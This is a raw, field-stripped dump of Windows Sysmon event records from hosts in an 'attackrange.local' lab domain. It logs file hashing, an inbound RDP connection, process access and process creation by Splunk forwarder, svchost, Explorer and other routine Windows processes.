Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0630F65710D26C07A53D2321DCB6BB43,SHA256=F980D66D2B638C935E58F883A1E333A098945C98F2F668EA6C42183227C67EFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977823Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:56.461{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8956759EFE00922F74F3FE43AC91DC28,SHA256=E2CF1FBDB2767CF08F29C845D57C14A558F620BCB7D4C4EABCF45F50218C7EAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.720{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-51078-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.333{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=184BEB39F75F9CB6B88328F2D8BC70C5,SHA256=45E5A3BC1976C06A8A9F4B0C8A25EE5DFAEE4ED8D125AD9DC12C50487FB97073,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.333{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DEF107CFC3FD6A55C090A32DF2ED61E,SHA256=1C2FB37E49CB0673C2E1F0E6B624C263465D13B7F1642DE03D0329DB9F3A9A5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977822Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:56.057{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4303MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.270{5EBD8912-89B0-6151-157A-00000000FC01}43965536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.070{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89B0-6151-157A-00000000FC01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.070{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.070{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.070{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.070{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.070{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89B0-6151-157A-00000000FC01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.070{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89B0-6151-157A-00000000FC01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:56.065{5EBD8912-89B0-6151-157A-00000000FC01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977825Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:57.475{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52264FBFA2C549FD6D1B11CF658815FC,SHA256=84C9AD3CD4C1D35A71A5626984133B5D2C684127B8CD0637E05B9D3DB9631F96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:57.548{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 